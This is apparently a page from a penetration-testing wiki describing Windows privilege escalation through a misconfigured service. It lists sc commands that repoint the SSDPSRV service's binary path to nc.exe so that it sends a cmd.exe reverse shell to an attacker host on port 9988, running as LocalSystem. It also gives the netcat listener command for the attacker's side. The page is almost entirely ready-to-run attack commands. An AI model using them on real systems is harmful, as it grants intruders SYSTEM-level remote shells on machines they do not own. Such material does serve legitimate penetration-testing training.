Skip to content

sc Service control

lethanhtung01011980 edited this page Oct 8, 2019 · 1 revision

Notes

  • Already has a low privilege shell.
  • Has RW for the service

Change service config

  • sc config SSDPSRV binpath= "C:\Inetpub\wwwroot\nc.exe -nv attacker_ip 9988 -e C:\WINDOWS\System32\cmd.exe"
  • sc config SSDPSRV depend= ""
  • sc config SSDPSRV obj= ".\LocalSystem" password= ""
  • sc qc SSDPSRV
  • sc config SSDPSRV start= auto
  • net start SSDPSRV

Run nc at attacker pc before starting the service

  • nc -nlvp 9988

Sidebar

0. COMMON exploits

1. Scan Info

1.2 Passive Gathering

1.3 Active Gathering

2. Pre-attack

2.2 File transfer

3. Get Reverse Shell

4. Exploits

4.2 Windows Exploits

4.3 Linux Exploits

4.4 Password crack

4.5 Buffer Overflow

4.6 Web attacks

6. Escalate Privilege

6.1 Escalate in Windows

6.2 Escalate in Linux

7. Access and further attacks

8. Port redirection and Tunnelling

9. Metasploit

10. Kali

11. Thirdparty scripts

Clone this wiki locally